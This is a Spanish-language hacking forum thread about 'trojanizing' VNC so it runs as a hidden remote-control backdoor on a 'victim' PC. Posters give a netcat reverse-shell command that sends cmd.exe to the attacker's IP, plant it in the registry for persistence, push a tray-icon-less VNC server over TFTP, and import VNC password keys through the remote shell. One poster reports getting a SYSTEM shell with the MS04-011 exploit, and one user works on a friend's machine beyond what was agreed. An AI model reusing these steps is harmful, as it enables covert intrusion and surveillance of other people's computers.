Tema destacado: Últimos eventos sobre seguridad/inseguridad
 Autor
|
Tema: Troyanizando VNC - Control Remoto Invisible (Leído 108,183 veces)
|
Locuras
 Desconectado
Mensajes: 55
|
Hola a todos
tengo un colega, me ha dejado meterme x el escritorio remoto del messenger.
me he metido en su registro y le he puesto una línea netcat
start /B c:\nc.exe -d -e cmd.exe "MI.IP" "MI.PUERTO"
y luego, esta misma línea la activo por cmd en su equipo.
como yo ya estaba a la escucha en mi puerto X, pues tengo su shell, hasta ahi bien ¿no?
Ahora bien... tecleo segun pantallazo de Gospel:
TFTP -i "MI.IP" get c:\winvnc.exe c:\vnc\winvnc.exe
yo tengo este archivos en mi c:\ raíz
y me da error de "tiempo de espera agotado"
mi colega tiene router, y yo tengo activado el firewall de xp
Cuando me da el error, tarda en dármelo, cuando yo desactivo mi firewall, el error aparece al segundo de darle enter, hemos probado a levantar un servicio ambas máquinas que se llama "Servicio de transferencia inteligente en segundo plano" pero nos sigue apareciendo el mismo error
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
Digamos que no has leido adecuadamente los manuales, ya que claramente especifican que el archivo a subir a la victima tiene que estar en el directorio del TFTP no el directorio raiz. TFTP -i "MI.IP" get c:\winvnc.exe c:\vnc\winvnc.exe en la parte que pones c:\winvnc.exe basta con que pongas solo "winvnc.exe", y el destino c:\vnc\winvnc.exe para que funcione, tendra que existir el directorio c:\vnc para que funcione saludos |
|
|
|
|
En línea
|
|
|
|
Locuras
Desconectado
Mensajes: 55
|
Wenas noches Le he dado a boton derecho c:, buscar he buscado TFTP y me aparece un archivo en el c:\windows\system32\tftp.exe pero no encuentro una carpeta con nombre TFTP el manual dice esto sobre TFTP: 4) Subir el Servidor VNC a la víctima. Después de haber obtenido una shell remota de la víctima, vamos a subir vía TFTP los archivos necesarios para poder ejecutar el Servidor VNC en el sistema de la víctima. Para ello, colocamos en la carpeta de nuestro Servidor TFTP (si no entiendes esto de Servidor TFTP, busca por el foro...) los siguientes archivos: yo he buscado por el foro cosas de TFTP y no leí nada referente a mi servidor TFTP  deduzco que por lo que me dices, me falta algo...  ¿me falta por instalar algún programa entonces? ¿o he de crearme yo la carpeta en algun lado? ??? |
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
¿me falta por instalar algún programa entonces? si para poder subir archivos via TFTP, el atacante debera de poner el archivo a subir a la victima dentro del directorio del servidor TFTP, por lo tanto deberas de instalarte un servidor TFTP en tu maquina, dicho servirdor lo puedes encontrar en la web de tu preferencia www.elhacker.net en la sección de hacking. saludos y suerte
|
|
|
|
|
En línea
|
|
|
|
Sir_Neo
Desconectado
Mensajes: 203
$ir ||ê0
|
no estoy muy seguro, pero creo que en el manual de gospel no dice que tienes que tener instalado el server del TFTP, pq a mi me paso lo mismo, y estuve probando una y otra vez, hasta que me dijeron que necesitaba el server.
Bueno si lo nombra, pero dice que busques por el foro. bueno ahi te dejo algunos comentarios.
Te bajas el server q es solo un ejecutable, lo lanzas, y se te abre una ventanita. Entonces, es cuando ejecutas la linea q tu ya sabes, y mientras q sube el fichero, en la ventanita del server sale informacion del fichero (ya lo veras).
Como te ha dicho zhyzura, metes los ficheros que quieras subir en la misma carpeta que tienes puesto el server TFTP.
prueba y nos cuentas.
Un Saludo
|
|
|
|
« Última modificación: 7 Octubre 2004, 05:30 por Sir_Neo »
|
En línea
|
|
|
|
Locuras
Desconectado
Mensajes: 55
|
Weno... os cuento. La verdad es q no todo ha salido a la perfección , pero algunas cosas si Yo a mi amigo, ya le puse en el registro el netcat para que me llamase a mi ip al encender, yo tenía mi ordenador a la escucha, en el mismo puerto q mi amigo, pero no ha conectado... el me ha solicitado asistencia remota, y yo le he abierto cmd.exe a mano, luego he arrancado el netcat yo a mano desde el cmd, y ya tenía su sell, he cerrado la asistencia remota luego instalé el Servidor TFTP que me dijisteis, y ahora si, la transferencia de archivos se ha hecho de lujo y sin problemas xD eso es lo q mas me a alegrado  transferí a su c:\vnc\2 archivos, y luego la dll al windows\system32 luego le he lanzado el winvnc.exe, mi amigo inmediatamente me ha advertido de que le ha salido una ventana, y estoy completamente seguro q el winvnc.exe que le he enviado era del paquete de NOTRAY, no se... luego le he dicho q se meta a mi colega en www.whatismyip.commi colega me ha dicho la misma ip q tenía ayer... como no me fiaba de esto, pq el creo q tiene ip dinámica, pues le he pasado un archivo x messenger, y al hacer un netstat pues me ha revelado su ip del día de hoy luego he abierto mi winvnccliente, el que zhyzura puso en su link he puesto la ip de mi colega, pero de dice connection refused, tampoco estoy muy seguro de la ip de mi colega hoy... el netstat me decía una, pero en la web de www.whatismyip.com me daba otra diferente, pero esta ip dada por esta web, era la misma que nos daba ayer al meternos en esta web tambien, asi si que no estoy muy seguro de su ip... de todas formas, en los 3 paquetes rar para bajar del vnc (el original, el NOTRAY, y el viewer de zhyzura) ambos tienen vcnviewer, en los 3 he puesto el nombre del host, la IP, las 2 que creo q son y no me conecta, aveces me pone conection refused, y conection timeout ya que estaba dentro del ordenador de mi colega le he puesto en el registro la clave para que inicie el winvnc.exe del tirón, aunq ya os he dicho q le sale la ventana esta de poner un "0" y poner la clave, la misma que tenenos que configurar nosotros al principio de ponernos el programita, yo me he desinstalado en vnc, lo he vueltro a instalar, le he quitado la clave (xq antes habia puesto 1) y ahora le he dejado la casilla de auto conectada, un poco mas a la izquierda se puede apreciar la casilla en gris con el 0 puesto. weno, haber q se os ocurre para decirme, acerca del uso del netcat y tb de lo del programa este... si todo esto q he escrito no lo entendeis bien, pues me preguntais y os lo aclaro, o si se os ocurre de como solucionarlo, pues tb me lo decis saludos a todos |
|
|
|
|
En línea
|
|
|
|
Locuras
Desconectado
Mensajes: 55
|
vale, un segundo, me acabo de dar cuenta, de que si no ponemos una clave al configurar el winvnc.exe , no nos va a permitir una conexión... ya lo probaré...  de todas formas, ya os aviso que a mi colega si le aparece la ventana del winvnc al arrancárselo yo mismo desde la remote shell (ahora que yo me lo he configurado yo bien, y me queda pendiente sibírselo de nuevo por si acaso, habría que asegurarse de esto) lo que mas me preocupa de todo esto, es lo del netcat,  q no me va muy bien, y weno... a ver q me podeis decir acerca de lo de averiguar lo de la ip de mi colega, o a ver que me podeis decir en general...  :'( |
|
|
|
|
En línea
|
|
|
|
|
Gospel
|
A ver, tienes q realizar las operaciones en secuencia, tal y como está explicado:
1) Instalar el original VNC en el equipo atacante
2) Configurar el Servidor ORIGINAL en el propio equipo del atacante.
Necesitamos configurar el Servidor antes de instalárselo a la víctima o de otro modo, no podremos conectarnos remotamente!!
Así pues, ejecutamos WinVNC.exe y nos saldra una ventana de propiedades. Comprobamos q en Display Number pone 0 y en Contraseña agregamos una q queramos...
3) Sustituir el Servidor ejecutable original por uno modificado para q no muestre el Tray Icon.
4) Subir el Servidor VNC MODIFICADO a la víctima.
Si lo haces así, no debe aparecer ninguna ventana en el equipo víctima...
Salu2
|
|
|
|
|
En línea
|
|
|
|
Locuras
Desconectado
Mensajes: 55
|
ok, lo haré
ya contaré experiencias
Gracias x contestar tu mismo Gospel
Saludos!
|
|
|
|
|
En línea
|
|
|
|
canallaman
Desconectado
Mensajes: 11
|
Tengo problemas con una pc que tiene WIN98 no puedo hacer que el vnc se conecte, me dice que el servidor no tiene un password definido que este esta en blanco.
Le hice una captura de pantalla y es asi se ven las propiedades del VNC con el pass en blanco.
Le subi los archivos tal cual lo instale en mi pc por las dudas C:\ARCHIVOS DE PRGRAMAS\ORL\VNC, reemplaze el archivo por el que es invisible como dice en el tutorial.
A ver si esto esta bien, me fije en mi registro y exporte esto
en un archivo llamado vnc.txt
[HKEY_CURRENT_USER\Software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"Password"=hex:ae,d9,fd,73,49,ec,14,14
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
luego con la shell que tengo de la pc de la victima hago lo siguiente:
C:\WINDOWS>regedit /l:c:\windows\system.dat vnc.txt
esta bien importado, al registro de la victima?
si es asi esta todo ta cual como esta instalado en mi pc y me dice que el password esta en blanco.
|
|
|
|
|
En línea
|
|
|
|
|
Man-In-the-Middle
|
conectate remotamente con su regedit, el problema me parece que tu passs, al momento de exportar no te write bien y te deja el bynary =000000000, tienes que modificarlo remotamente y de ahi hacer un reboot
enjoy
Man-In-the-Middle
|
|
|
|
|
En línea
|
|
|
|
canallaman
Desconectado
Mensajes: 11
|
La maquina esta tiene win 98 como puedo hacer para modificar esta linea del registro?
|
|
|
|
|
En línea
|
|
|
|
Locuras
Desconectado
Mensajes: 55
|
tienes q poner un password, el programa avisa que sin password no deja hacer conexciones de ningun tipo
|
|
|
|
|
En línea
|
|
|
|
|
Man-In-the-Middle
|
Mira te mentiria, pero en mi caso para xp win200
me pongo como administrador
me mapeo
C:\net use x: \\10.10.0.x\C$ pwd /user:nombre_equipo_remoto\test
entro ami regedit
y me conecto remotamente
modifico
en el caso de win200
subes el regini
y en la shell
regini.exe -m \\10.10.1.253 vnc.ini
regini.exe -m \\10.10.1.253 vnc.ini(2 veces)
archivos upload (regini.exe, vnc.ini)
En caso de xp
Te instalas el vnc en tu mauina
Exportas el reg del ORL
y en la shell
reg import vnc.reg.
archivos upload(vnc.reg)
espero que te sirva de algo
Enjoy
Man-In-the-Middle
|
|
|
|
|
En línea
|
|
|
|
|
Gospel
|
Bueno, estaba equivocado!!! Da bastantes problemas... Cuando publique el minitutorial, habia obtenido la shell remota de forma manual, es decir, habia dejado en el equipo atacante el nc a la escucha y desde el equipo victima le devolvia la reverse shell. Una vez conseguida la shell remota, seguí los pasos uno a uno y me dieron éxito las dos veces q probé. En este caso, la shell remota era con privilegios del usuario q me devolvió la reverse shell. Ahora he cambiado de escenario. Me sitúo en una red local y para acceder a la shell remota de la víctima aprovecho la vulnerabilidad MS04-011 y obtengo una shell remota a través del exploit. El problema es q esta shell remota es con privilegios de SYSTEM. He seguido los pasos y me da el error: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted Es decir, no guarda la contraseña. También he probado a volcar mi carpeta VNC3 del registro en un vnc.reg. Le subo a la víctima los 3 archivos y también le subo este vnc.reg. Ejecuto "reg import vnc.reg" y despues pongo en marcha el vnc. Lo siguiente es intentar conectarse con el vncviewer. HE probado con el original, con el de la carpeta de noIcon y con la version q posteo Zhyzura y me salta Error. Connection closed en los 3 casos. Bueno, unas cuantas cosas: 1) Si sois tan amables, Zhyzura y Man in the Middle, detalladme el escenario con el q estáis trabajando. Como conseguis la shell remota, con q privilegios, cómo ejecutáis el server del vnc, etc 2) Man in the Middle!! Tienes bastante conocimiento respecto a este tema, pero te expresas de culo y no te entiendo nada bien  Si eres tan amable, postea tu experiencia paso a paso, con buena letra y q todos podamos enterarnos pq es muy interesante lo de añadir la clave del registro para poner la contraseña. Te lo digo en serio, eh!! Hala, a ver si encontramos un método universal y publicamos un bonito tutorial. Por mi parte, he subido al PAFileDB los archivos del VNC, tanto la version original como la versión modificada para q no muestre el Tray Icon. De esta forma, siempre podremos contar con ellos... VNC Original: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=63VNC Modificado No Tray Icon: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=64Salu2 |
|
|
|
|
En línea
|
|
|
|
|
 |
